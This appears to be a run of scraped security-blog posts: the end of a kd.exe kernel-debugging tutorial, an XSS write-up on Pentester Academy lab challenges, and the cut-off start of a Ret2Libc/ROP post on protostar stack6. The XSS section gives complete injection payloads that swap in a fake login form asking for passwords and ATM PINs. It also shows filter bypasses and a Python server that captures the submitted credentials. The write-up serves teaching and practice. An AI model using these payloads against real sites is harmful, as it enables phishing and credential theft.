Go back to the Windows XP machine and in the debugger terminal window press Control + C:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
Break instruction exception - code 80000003 (first chance)
*******************************************************************************
*                                                                             *
*   You are seeing this message because you pressed either                    *
*       CTRL+C (if you run kd.exe) or,                                        *
*       CTRL+BREAK (if you run WinDBG),                                       *
*   on your debugger machine's keyboard.                                      *
*                                                                             *
*                   THIS IS NOT A BUG OR A SYSTEM CRASH                       *
*                                                                             *
* If you did not intend to break into the debugger, press the "g" key, then   *
* press the "Enter" key now.  This message might immediately reappear.  If it *
* does, press "g" and "Enter" again.                                          *
*                                                                             *
*******************************************************************************
nt!RtlpBreakWithStatusInstruction:
8288e7b8 cc              int     3
kd>

Now we have broken into the kernel, this means that anything we do will be in the context of the kernel, we can see this in the debugger:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
kd> .process
Implicit process is now 844bdae8
kd> !process 0 0
**** NT ACTIVE PROCESS DUMP ****
PROCESS 844bdae8  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00185000  ObjectTable: 88401c78  HandleCount: 463.
    Image: System

PROCESS 85027020  SessionId: none  Cid: 00ec    Peb: 7ffd4000  ParentCid: 0004
    DirBase: 5f228020  ObjectTable: 89496538  HandleCount:  29.
    Image: smss.exe

PROCESS 85702030  SessionId: 0  Cid: 0140    Peb: 7ffd6000  ParentCid: 0134
    DirBase: 5f228060  ObjectTable: 91695508  HandleCount: 389.
    Image: csrss.exe

PROCESS 84520378  SessionId: 0  Cid: 0170    Peb: 7ffdf000  ParentCid: 0134
    DirBase: 5f2280a0  ObjectTable: 93023448  HandleCount:  87.
    Image: wininit.exe

PROCESS 850e7030  SessionId: 1  Cid: 0178    Peb: 7ffda000  ParentCid: 0168
    DirBase: 5f228040  ObjectTable: 885f5520  HandleCount: 176.
    Image: csrss.exe

PROCESS 8572f530  SessionId: 1  Cid: 0194    Peb: 7ffdb000  ParentCid: 0168
    DirBase: 5f2280c0  ObjectTable: 93020e70  HandleCount: 117.
    Image: winlogon.exe

PROCESS 857e2c48  SessionId: 0  Cid: 01dc    Peb: 7ffd6000  ParentCid: 0170
    DirBase: 5f228080  ObjectTable: 98040678  HandleCount: 245.
    Image: services.exe

PROCESS 857fb980  SessionId: 0  Cid: 01e4    Peb: 7ffdf000  ParentCid: 0170
    DirBase: 5f2280e0  ObjectTable: 9805ba38  HandleCount: 504.
    Image: lsass.exe

PROCESS 857fc678  SessionId: 0  Cid: 01ec    Peb: 7ffdf000  ParentCid: 0170
    DirBase: 5f228100  ObjectTable: 9805dcf0  HandleCount: 144.
    Image: lsm.exe

PROCESS 8582c858  SessionId: 0  Cid: 0258    Peb: 7ffd6000  ParentCid: 01dc
    DirBase: 5f228120  ObjectTable: 98168ef8  HandleCount: 352.
    Image: svchost.exe

PROCESS 85845848  SessionId: 0  Cid: 02a4    Peb: 7ffd3000  ParentCid: 01dc
    DirBase: 5f228140  ObjectTable: 93182530  HandleCount: 241.
    Image: svchost.exe

PROCESS 8585b568  SessionId: 0  Cid: 02e0    Peb: 7ffd7000  ParentCid: 01dc
    DirBase: 5f228160  ObjectTable: 980d5468  HandleCount: 383.
    Image: svchost.exe

PROCESS 85897628  SessionId: 0  Cid: 0350    Peb: 7ffdf000  ParentCid: 01dc
    DirBase: 5f2281a0  ObjectTable: 8ca18bc0  HandleCount: 268.
    Image: svchost.exe

PROCESS 858a7410  SessionId: 0  Cid: 037c    Peb: 7ffda000  ParentCid: 01dc
    DirBase: 5f2281c0  ObjectTable: 8ca8e818  HandleCount: 251.
    Image: svchost.exe

PROCESS 858bf818  SessionId: 0  Cid: 03b4    Peb: 7ffdf000  ParentCid: 01dc
    DirBase: 5f2281e0  ObjectTable: 8ca00b30  HandleCount: 806.
    Image: svchost.exe

PROCESS 858ce658  SessionId: 0  Cid: 03ec    Peb: 7ffd8000  ParentCid: 02e0
    DirBase: 5f228200  ObjectTable: 8cb845d0  HandleCount: 121.
    Image: audiodg.exe

PROCESS 858d37c0  SessionId: 0  Cid: 0400    Peb: 7ffde000  ParentCid: 01dc
    DirBase: 5f228220  ObjectTable: 8cb97f58  HandleCount: 104.
    Image: svchost.exe

PROCESS 858e8238  SessionId: 0  Cid: 0460    Peb: 7ffd6000  ParentCid: 01dc
    DirBase: 5f228240  ObjectTable: 8cbc3380  HandleCount: 351.
    Image: svchost.exe

PROCESS 85707d40  SessionId: 1  Cid: 050c    Peb: 7ffd9000  ParentCid: 0194
    DirBase: 5f228280  ObjectTable: 92cff7b0  HandleCount:  46.
    Image: userinit.exe

PROCESS 8593dd40  SessionId: 1  Cid: 051c    Peb: 7ffda000  ParentCid: 0350
    DirBase: 5f2282a0  ObjectTable: 92d040e0  HandleCount:  71.
    Image: dwm.exe

PROCESS 8594b738  SessionId: 1  Cid: 0538    Peb: 7ffde000  ParentCid: 050c
    DirBase: 5f2282c0  ObjectTable: 92d16c08  HandleCount: 684.
    Image: explorer.exe

PROCESS 8595d990  SessionId: 0  Cid: 055c    Peb: 7ffd8000  ParentCid: 01dc
    DirBase: 5f2282e0  ObjectTable: 980413e8  HandleCount:  75.
    Image: spoolsv.exe

PROCESS 85975d40  SessionId: 1  Cid: 0574    Peb: 7ffdb000  ParentCid: 01dc
    DirBase: 5f228300  ObjectTable: 98087388  HandleCount: 180.
    Image: taskhost.exe

PROCESS 8597c480  SessionId: 0  Cid: 059c    Peb: 7ffd8000  ParentCid: 01dc
    DirBase: 5f228320  ObjectTable: 981644c0  HandleCount: 321.
    Image: svchost.exe

PROCESS 857b1030  SessionId: 0  Cid: 061c    Peb: 7ffdf000  ParentCid: 01dc
    DirBase: 5f228340  ObjectTable: 9361d7c0  HandleCount:  62.
    Image: armsvc.exe

PROCESS 8576a030  SessionId: 0  Cid: 066c    Peb: 7ffd8000  ParentCid: 01dc
    DirBase: 5f228360  ObjectTable: 98192530  HandleCount:  84.
    Image: sqlwriter.exe

PROCESS 857b99c0  SessionId: 0  Cid: 0694    Peb: 7ffd8000  ParentCid: 01dc
    DirBase: 5f228380  ObjectTable: 9765fa30  HandleCount:  92.
    Image: tlntsvr.exe

PROCESS 85996d40  SessionId: 1  Cid: 06bc    Peb: 7ffdf000  ParentCid: 0538
    DirBase: 5f2283a0  ObjectTable: 976b6a40  HandleCount:  64.
    Image: tvnserver.exe

PROCESS 859d92f0  SessionId: 0  Cid: 0708    Peb: 7ffdc000  ParentCid: 01dc
    DirBase: 5f2283e0  ObjectTable: 8d600730  HandleCount: 184.
    Image: tvnserver.exe

PROCESS 859ec4f0  SessionId: 1  Cid: 075c    Peb: 7ffd3000  ParentCid: 06cc
    DirBase: 5f228400  ObjectTable: 9812e900  HandleCount:  48.
    Image: reader_sl.exe

PROCESS 859f7d40  SessionId: 0  Cid: 0220    Peb: 7ffdd000  ParentCid: 01dc
    DirBase: 5f2283c0  ObjectTable: 977880a0  HandleCount: 102.
    Image: svchost.exe

PROCESS 85a68d40  SessionId: 0  Cid: 03c4    Peb: 7ffd9000  ParentCid: 01dc
    DirBase: 5f228260  ObjectTable: 980eb688  HandleCount: 590.
    Image: SearchIndexer.exe

PROCESS 85a4cd40  SessionId: 0  Cid: 04dc    Peb: 7ffd5000  ParentCid: 03c4
    DirBase: 5f228420  ObjectTable: 94285460  HandleCount: 233.
    Image: SearchProtocolHost.exe

PROCESS 85a95d40  SessionId: 0  Cid: 0378    Peb: 7ffd5000  ParentCid: 03c4
    DirBase: 5f228440  ObjectTable: 931b48e8  HandleCount:  79.
    Image: SearchFilterHost.exe

PROCESS 85abfd40  SessionId: 1  Cid: 08e4    Peb: 7ffdf000  ParentCid: 0538
    DirBase: 5f228460  ObjectTable: 92c6b320  HandleCount:  35.
    Image: SomeCrypto~01.exe

kd>

On line 1 I run the .process command without any parameters and it tells us the process we are currently in (844bdae8 is the EPROCESS number).

On line 3 I run the !process extension with 0 0 as its arguments, this lists all of the running processes and some details about them, as you can see from lines 5-7, EPROCESS 844bdae8 is the System process, or the kernel.

What we want to do is change the context to our crackme application, which you can see from lines 141-143 has the EPROCESS of 85abfd40:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
kd> .process /i /r /p 85abfd40
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
828c97b8 cc              int     3
kd> .process
Implicit process is now 85abfd40
kd>

On line 1 I use the .process command to change the context to our crackme application but before the context can be changed execution needs to be resumed (which is done on line 5).

Now we can set a breakpoint anywhere in the crackme's virtual memory address space, we want to break with them calls to GetDlgItemTextA that were responsible for getting the text in the textboxes of the application (If you are unsure about what I am talking about, please go back and review the previous post):

1
2
3
4
kd> bp USER32!GetDlgItemTextA
kd> bl
 0 e 76213d14     0001 (0001) user32!GetDlgItemTextA
kd>

Now that the breakpoint is set we can resume execution, wait for it to be hit and inspect the memory.

Remember that the prototype for GetDlgItemText is:

1
2
3
4
5
6
UINT WINAPI GetDlgItemText(
  _In_   HWND hDlg,
  _In_   int nIDDlgItem,
  _Out_  LPTSTR lpString,
  _In_   int nMaxCount
);
1
2
3
4
5
6
7
8
9
kd> g
Breakpoint 0 hit
user32!GetDlgItemTextA:
001b:76213d14 8bff            mov     edi,edi
kd> dd esp L4
0012fb6c  0040127f 0002014e 000003e9 0012fc40
kd> da 12fc40
0012fc40  "Enter your name..."
kd>

On line 5 I use the dd command to display 4 double words on the top of the stack. The first dword will be the return address (as you will see in a minute), then we have the first 3 arguments.

The 3rd argument is the address where the buffer for the string is, on line 7 I use the da command to display the ascii value at that address.

Keep in mind that this is the start of the function so the value hasn't been fetched yet, we can see the returned value by tracing through until we are in the calling function using the ug command and checking again:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
kd> gu
001b:0040127f 6a40            push    40h
kd> u
001b:0040127f 6a40            push    40h
001b:00401281 8d942484000000  lea     edx,[esp+84h]
001b:00401288 52              push    edx
001b:00401289 68ea030000      push    3EAh
001b:0040128e 56              push    esi
001b:0040128f ffd7            call    edi
001b:00401291 8d44240c        lea     eax,[esp+0Ch]
001b:00401295 50              push    eax
kd> da 12fc40
0012fc40  "Enter your name..."
kd>

As you can see the value is the same (because we haven't changed the text in the textbox), you can also see the address which it returned back to after executing GetDlgItemTextA was 0040127f, which was the top value on the stack.

Lastly let's resume and make sure it does the same with the other textbox:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
kd> g
Breakpoint 0 hit
user32!GetDlgItemTextA:
001b:76213d14 8bff            mov     edi,edi
kd> dd esp L4
0012fb6c  00401291 0002014e 000003ea 0012fc00
kd> da 12fc00
0012fc00  "Enter your serial..."
kd> gu
001b:00401291 8d44240c        lea     eax,[esp+0Ch]
kd> da 12fc00
0012fc00  "Enter your serial..."

Conclusion

This was only a simple tutorial to get the environment set up and get a basic grasp of kd.exe and some of its commands.

This was by no means an exhaustive list of commands and extensions, the debugger comes with many and has very good documentation.

Hopefully you now have a better understanding of how to debug using kd.exe and you now have the environment to do it in.

Further Reading

The Debugging and Automation chapter in Practical Reverse Engineering by Bruce Dang, Alexandre Gazet and Elias Bachaalany.

Also the kd.exe documentation that ships with the WDK or SDK.

✇eXploit

Reflected XSS at PentesterAcademy

By: 0xe7

Here I will demonstrate 3 XSS attacks against 3 different challenges on Pentester Academy.

Pentester Academy has a large number of courses and challenges devoted to learning penetration testing and improving your skills.

My aim here will be first to demonstrate basic reflected XSS and then show how 2 different filters can be beaten.

XSS is the ability to execute JavaScript inside the browser of anyone who visits a specific webpage usually by injecting a combination of HTML and JavaScript.

Challenge 16: HTML Injection

The first one we'll look at is challenge 16.

This is the actual challenge page, if you browse to it, you should see this:

What I'm going to do is replace the whole form with one of my own which submit's to a server of my choosing and has an extra field but, otherwise, looks exactly the same as the real 1.

First, let's have a look at the vulnerability. First we need to see what happens when we submit a form:

I submitted the form with foo in the username field and bar in the password field. This is the full URL that I end up with:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email=foo&password=bar

As you can see, this was just submitted to the same page as a GET request. As this is the case, we can just manipulate this URL to test the fields, if the form had submitted a POST request, we'd have to keep submitting the form or use something like Burp Suite's Repeater feature.

You can see that the value of the email field has been reflected in the username input box. This is where we can test for a reflected XSS/HTMLi vulnerability.

Before that, let's check the source of this page to see in what context on the page our input has landed, right click on the page and click something like View Source:

So we've landed inside the value attribute of an input tag.

Now let's check if we can use certain characters, send the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email=foo"<'()[]>&password=bar

It looks like theres little to no filtering here, we've managed to close the input tag with the greater than (>) character that we sent, but let's look at the source:

So as suspected, there has been no filtering, this makes our job much easier.

Looking at the source code of the vulnerable form, we can figure out any required prefix and suffix:

1
2
3
4
5
6
7
8
9
<form class="form-signin">
  <h2 class="form-signin-heading">Please sign in</h2>
  <input type="text" value="INJECTIONPOINT" class="input-block-level" placeholder="Email address" name="email">
  <input type="password" class="input-block-level" placeholder="Password" name="password">
  <label class="checkbox">
    <input type="checkbox" value="remember-me" name="DoesThisMatter"> Remember me
  </label>
  <button class="btn btn-large btn-primary" type="submit">Sign in</button>
</form>

All we should need to do here is break out of the value attribute and the input tag, to do this we'll need to put a double quote (") (because the value attribute was opened with a ") and >, respectively, at the start of our input.

We should now test for the classic alert box XSS payload with our prefix of "> by sending the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>alert('xss')</script>

It worked, I put the alert statement inside script tags, this is to tell the browser that this is JavaScript to be executed.

If you close the alert box and view the source you should see this:

Using this we can run any JavaScript we want, we just have to replace alert('xss'), and as I will demonstrate this allows us full control over the page that is displayed.

The first thing we need to do is remove the current form so that we can put our own form in its place.

We can find all of the forms on the page using the getElementsByTagName method.

The best way to build your JavaScript payload is to use Firebug, it allows you to write JavaScript dynamically while showing you what methods and attributes each object has avaliable.

If you open firebug, go to the Console tab and type document. if will show you a list of its methods and attributes.

If you look through the whole source of the webpage you will see that there is only 1 form, and getElementsByTagName returns an array containing all of the form objects so to access the actual form we need to run document.getElementByTagName("form")[0] to access the first element of the array:

Each object has a remove method, we can use this to remove the original form.

Also, in JavaScript, all instructions can be put on a single line but they should be seperated by a semi colon (;).

Let's try using the XSS to first remove the form using the method described and then trigger and alert box as we did before, for this we will use the following URL:

pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove();alert('xss')</script>

So that didn't work, let's look at the source and see what happened:

So it appears that our payload was cut off from the ;, we can solve this 2 ways, the first is easiest and most well known, replace the ; with a URL encoded version (%3b):

pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove()%3balert('xss')</script>

That works, but I also want to show you another method incase ;'s are blocked completely, ;'s can be replaced with comma's (,).

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove(),alert('xss')</script>

From this point on I'll use ,'s to seperate the instructions when sent to the server but in my examples while building the JavaScript payload I'll use ;'s.

Now we need to create the new form, we can do this using the createElement and appendChild methods, as well as the className, innerHTML, placeholder, name, type and action attributes.

Here is a full version of the Javascript that will build the form that we want and ensure it has all of the necessary attributes to make it look athentic:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
var form = document.createElement("form");
var head = document.createElement("h2");
head.className = "form-signin-heading";
head.innerHTML = "Please sign in";
var user = document.createElement("input");
var pass = document.createElement("input");
var atm = document.createElement("input");
user.className = "input-block-level";
pass.className = "input-block-level";
atm.className = "input-block-level";
user.placeholder = "Username";
user.name = "un";
user.type = "text";
pass.name = "pw";
pass.placeholder = "Password";
pass.type = "password";
atm.name = "atm";
atm.placeholder = "ATM PIN";
atm.type = "password";
var button = document.createElement("button");
button.className = "btn btn-large btn-primary";
button.type = "submit";
button.innerHTML = "Login";
form.appendChild(head);
form.appendChild(user);
form.appendChild(pass);
form.appendChild(atm);
form.appendChild(button);
form.className="form-signin";
form.action="http://localhost:9000/";

All of the information here, especially the class names, I got from the original form. I've created a new form field on line 7 and set its settings on lines 10, 17, 18 and 19.

On line 30, I set the form action to http://localhost:9000/, this means when the form is submitted it will send the request to localhost on port 9000, this could be set to any value/server under the attackers control.

The completed form is contained inside the form variable.

The last thing to do is place the form at the right place on the page. If you look through the source, the form is placed inside a div tag with the class container, before a div tag with a class well.

We can find both of these using the getElementsByClassName method and we can insert it using the insertBefore, here is the code for this:

1
2
3
var container = document.getElementsByClassName("container")[0];
var element = document.getElementsByClassName("well")[0];
container.insertBefore(form, element);

Now we have all of the code we want to run, we just need to shrink the code as much as possible, we do this because in any exploit its best to keep the payload as small as possible so there is less chance of it being noticed.

Firstly all of the spaces need to be removed, in most situations spaces only make the code easier to read, next we can shrink all of the variable names down to 1 character, let's just take the first character of each as their name, unless use strict; is used on the page (which it isn't) there is no need to declare the variables with the var keyword and lastly we use the document object repeatedly, we can create a variable with a 1 character name that point to it and use the variable instead (d=document;).

After applying the rules above, moving everything to 1 line and changing the ;'s with ,'s you get the following code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
d=document,d.getElementsByTagName("form")[0].remove(),f=d.createElement("form
"),h=d.createElement("h2"),h.className="form-signin-heading",h.innerHTML="Ple
ase sign in",u=d.createElement("input"),p=d.createElement("input"),a=d.create
Element("input"),u.className="input-block-level",p.className="input-block-lev
el",a.className="input-block-level",u.placeholder="Username",u.name="un",u.ty
pe="text",p.name="pw",p.placeholder="Password",p.type="password",a.name="atm"
,a.placeholder="ATM PIN",a.type="password",b=d.createElement("button"),b.clas
sName="btn btn-large btn-primary",b.type="submit",b.innerHTML="Login",f.appen
dChild(h),f.appendChild(u),f.appendChild(p),f.appendChild(a),f.appendChild(b)
,f.className="form-signin",f.action="http://localhost:9000/",c=d.getElementsB
yClassName("container")[0],e=d.getElementsByClassName("well")[0],c.insertBefo
re(f,e)

We could probably shrink this down some more but this will do for now.

To send this payload we have to send the payload inbetween the script tags, after that you should see the following:

Looking at the source we can see that it has been injected fine:

Python Capture Server

I've written a little python script using SimpleHTTPServer to capture these details:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/usr/bin/env python

import SocketServer
import SimpleHTTPServer

class HTTPRequestHandler (SimpleHTTPServer.SimpleHTTPRequestHandler):

    def do_GET(self):
        qs = self.path.split("?")[1]
        args = qs.split("&")
        c, p = self.client_address
        un = pw = ""
        for arg in args:
            name = arg.split("=")[0]
            value = arg.split("=")[1]
            if name == "un":
                print c + " - UN: " + value
                un = value
            elif name == "pw":
                print c + " - PW: " + value
                pw = value
            elif name == "atm":
                print c + " - ATM: " + value
        self.send_response(301)
        self.send_header('Location','http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email=' + un + '&password=' + pw)
        self.end_headers()

httpServer = SocketServer.TCPServer(("", 9000), HTTPRequestHandler)
httpServer.serve_forever()

This server is set to print the values to stdout and then redirect to the actual application.

With the above python server running, when our custom form is submitted you get the following:

And the output on the python server's stdout:

1
2
3
4
127.0.0.1 - UN: Username
127.0.0.1 - PW: S0m%C2%A3S3cr3tP4ssw0rd
127.0.0.1 - ATM: 1234
127.0.0.1 - - [10/Aug/2014 17:40:08] "GET /?un=Username&pw=S0m%C2%A3S3cr3tP4ssw0rd&atm=1234 HTTP/1.1" 301 -

So that is challenge 16 completed for what we wanted to achieve and everything is transparent to the end user, you just need to send the malicious link to the target.

Challenge 16 Secure

The next challenge is here, some filtering has been added to mitigate the previous exploit.

First let's look at the challenge:

This looks exactly the same as the last challenge, so let's use the application and see if that is the same:

So far everything looks the same, even the URL we are sent to:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=foo&password=bar

Let's analyse this application the same way as before by sending the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=foo"<'()[]>

Looks interesting, let's look at the source:

So < and > has been encoded but " hasn't, looks like we'll have to use an event handler to run our JavaScript this time.

Ideally we want the event handler to run without any interaction, a lot of the event handlers require some interaction.

We are landing inside an input tag and 1 event we can hook is the onfocus event, but we need to make sure that the input box is in focus when the page loads, for this we can use the autofocus attribute.

So we now need a new prefix for our payload, we need to close the value attribute, with a ", we then need a space and the autofocus keyword, then a space and lastly onfocus=", so we end up with:

" autofocus onfocus="

After this there is no need to put any script tags, we can't anyway because < and > gets encoded.

Let's try executing an alert box to test if XSS works here, we need to send the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=" autofocus onfocus="alert('xss')

So we can now run JavaScript on this page, we will recreate the exact same attack as last time, the only change we need is to replace every " with a single quote ('), then we end up with this as our JavaScript:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
d=document,d.getElementsByTagName('form')[0].remove(),f=d.createElement('form
'),h=d.createElement('h2'),h.className='form-signin-heading',h.innerHTML='Ple
ase sign in',u=d.createElement('input'),p=d.createElement('input'),a=d.create
Element('input'),u.className='input-block-level',p.className='input-block-lev
el',a.className='input-block-level',u.placeholder='Username',u.name='un',u.ty
pe='text',p.name='pw',p.placeholder='Password',p.type='password',a.name='atm'
,a.placeholder='ATM PIN',a.type='password',b=d.createElement('button'),b.clas
sName='btn btn-large btn-primary',b.type='submit',b.innerHTML='Login',f.appen
dChild(h),f.appendChild(u),f.appendChild(p),f.appendChild(a),f.appendChild(b)
,f.className='form-signin',f.action='http://localhost:9000/',c=d.getElementsB
yClassName('container')[0],e=d.getElementsByClassName('well')[0],c.insertBefo
re(f,e)

Sending this in place of alert('xss') in our previous request gives us the following:

Looking at the source, we can see how our payload got interpreted:

Now we are in the same position as we were when we'd got our custom form on the other page.

Last Challenge: DOM XSS

This is the last challenge I'd like to demonstrate.

Even though this challenge is very different I want to create the same exploit where I create a custom form and put it on the page in a similar position as the previous examples.

Its quite a bit more difficult to exploit but let's get to it and have a look at how it works:

Its clearly doing some maths here based on the value of the statement argument given in the address bar, let's look at the source:

So we are landing inside script tags and our input is being used as an argument to eval.

This time, however, we can't see how our payload is being interpreted directly.

We should be able to run any JavaScript inside here though, let's try a normal alert box by sending the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=alert('xss')

That didn't work, let's open Firebug, open the console tab and try again (this should show us any error's that happened while it was executing any JavaScript):

So the problem is that the ' are URL encoded... This is because, as you can see from the source code, it is accessing the argument using the document.URL property where certain characters are URL encoded so we will be unable to use any types of quotes (' or ").

There are probably a few ways to beat this problem, an obvious 1 is to avoid using strings but we are unable to do that here.

The way I like to get around this is to use String objects and using forward slashes (/) at the beginning and end to imply it is a regular expression.

Let's try to execute an alert using this method, we need to send the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=alert(String(/xss/))

So it worked but we have / surrounding the string, we can use the substring method and the length property to remove these, we need to send the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=x=String(/xss/),alert(x.substring(1,x.length-1))

We will be using the String and substring methods a lot, so it would be best if we create aliases for these to shorten our payload, we can create a function for the substring section like this:

y=function(z){return/**/z.substring(1,z.length-1)}

I have used /**/ here because we are also unable to use spaces (they are URL encoded too) and this just acts as a comment.

This function takes 1 argument and returns the string with the first and last character removed.

We can create an alias for the String method using this code:

S=String

Before we start to write our payload, let's test this with an alert by sending the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=S=String,y=function(z){return/**/z.substring(1,z.length-1)},alert(y(S(/xss/)))

So it works, lastly all we need to do is remove the string Mathemagic and the div tag that contains the result.

Looking at the source we can see that the Mathemagic string is contained in a h2 tag and there are no other h2 tags on the page, so we can find this using the getElementsByTagName method.

The result is contained inside a div tag which has the id value set to result, so we can find this using the getElementById method.

Both of these we can remove using the remove method.

We are now ready to write our payload, here is the "beutified" version of the payload, remember that this all goes on 1 line and with , seperating the instructions and not ;:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
S=String;
y=function(z){
    return/**/z.substring(1,z.length-1);
};
d=document;
f=d.createElement(y(S(/form/)));
h=d.createElement(y(S(/h2/)));
h.className=y(S(/form-signin-heading/));
h.innerHTML=y(S(/Please&#32sign&#32in/));
z=S(/input/);
u=d.createElement(y(z));
p=d.createElement(y(z));
a=d.createElement(y(z));
z=S(/input-block-level/);
u.className=y(z);
p.className=y(z);
a.className=y(z);
u.placeholder=y(S(/username/));
u.name=y(S(/un/));
u.type=y(S(/text/));
p.name=y(S(/pw/));
p.placeholder=y(S(/Password/));
z=S(/password/);
p.type=y(z);
a.type=y(z);
a.name=y(S(/atm/));
a.placeholder=y(S(/ATMPIN/));
b=d.createElement(y(S(/button/)));
b.className=y(S(/btn/));
b.classList.add(y(S(/btn-large/)));
b.classList.add(y(S(/btn-primary/)));
b.type=y(S(/submit/));
b.innerHTML=y(S(/Login/));
f.appendChild(h);
f.appendChild(u);
f.appendChild(p);
f.appendChild(a);
f.appendChild(b);
f.className=y(S(/form-signin/));
f.action=y(S(/http:\/\/localhost:9000\//).replace(/\\/g,String()));
c=d.getElementsByClassName(y(S(/container/)))[0];
e=d.getElementsByClassName(y(S(/well/)))[0];
c.insertBefore(f,e);
c.getElementsByTagName(y(S(/h2/)))[0].remove();
d.getElementById(y(S(/result/))).remove()

So using this the URL that you will need to send is:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=S=String,y=funct
ion(z){return/**/z.substring(1,z.length-1)},d=document,f=d.createElement(y(S(
/form/))),h=d.createElement(y(S(/h2/))),h.className=y(S(/form-signin-heading/
)),h.innerHTML=y(S(/Please&#32sign&#32in/)),z=S(/input/),u=d.createElement(y(
z)),p=d.createElement(y(z)),a=d.createElement(y(z)),z=S(/input-block-level/),
u.className=y(z),p.className=y(z),a.className=y(z),u.placeholder=y(S(/usernam
e/)),u.name=y(S(/un/)),u.type=y(S(/text/)),p.name=y(S(/pw/)),p.placeholder=y(
S(/Password/)),z=S(/password/),p.type=y(z),a.type=y(z),a.name=y(S(/atm/)),a.p
laceholder=y(S(/ATMPIN/)),b=d.createElement(y(S(/button/))),b.className=y(S(/
btn/)),b.classList.add(y(S(/btn-large/))),b.classList.add(y(S(/btn-primary/))
),b.type=y(S(/submit/)),b.innerHTML=y(S(/Login/)),f.appendChild(h),f.appendCh
ild(u),f.appendChild(p),f.appendChild(a),f.appendChild(b),f.className=y(S(/fo
rm-signin/)),f.action=y(S(/http:\/\/localhost:9000\//).replace(/\\/g,String()
)),c=d.getElementsByClassName(y(S(/container/)))[0],e=d.getElementsByClassNam
e(y(S(/well/)))[0],c.insertBefore(f,e),c.getElementsByTagName(y(S(/h2/)))[0].
remove(),d.getElementById(y(S(/result/))).remove()

After sending this URL you should see the following:

PWNED!!! :-)

Conclusion

For the last to exploits, the redirection URL of the python server would have to be changed.

XSS exploits can vary greatly, but as long as you can get JavaScript to run you should be able to get full control over the page.

There are various methods for bypassing different filters and I've only mentioned a couple here but the methods that you use will highly depend on the filter that you are facing.

A lot of trial and error is needed to determine how best to bypass the filter than is in place.

In each of these examples, to take advantage of the exploit, you need to send the URL that we have created to the victim. A URL containing all of this information might look very strange to the victim so it might be best to URL encode the whole payload, you can do this in BurpSuite's Decoder tab or on a website like this, its worth noting though that Burp will URL encode all of the text (incuding any alphanumeric characters), that website (like most) will only encode certain characters.

Further Reading

OWASP is the authority on web security so their website contains any relavent information regarding this.

The OWASP XSS page and XSS filter evasion cheat sheet are very good resources.

Also, the OWASP testing guide has a great page on how to go about testing for XSS.

✇eXploit

Ret2Libc and ROP

By: 0xe7

So far, all of our exploits have included shellcode, on most (if not all) modern systems it isn't possible to just run shellcode like this because of NX.

NX disallows running code in certain memory segments, primarily memory segments that contain variable data, like the stack and heap.

A number of techniques were created to beat NX and I want to demostrate 2 of them here, return to libc (Ret2Libc) and return-oriented programming (ROP).

This will be slightly different to my previous posts as I will not be hacking an application that I wrote but instead taking on 2 challenges from the protostar section of exploit exercises.

The challenges that we will look at here are stack6 and stack7.

While these challenges have both NX and ASLR disabled they both implement their own protection which disables the straight running of shellcode.

Stack6: The App

So if you look at the webpage for stack6, it actually gives you the source code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
    printf("bzzzt (%p)\n", ret);
    _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

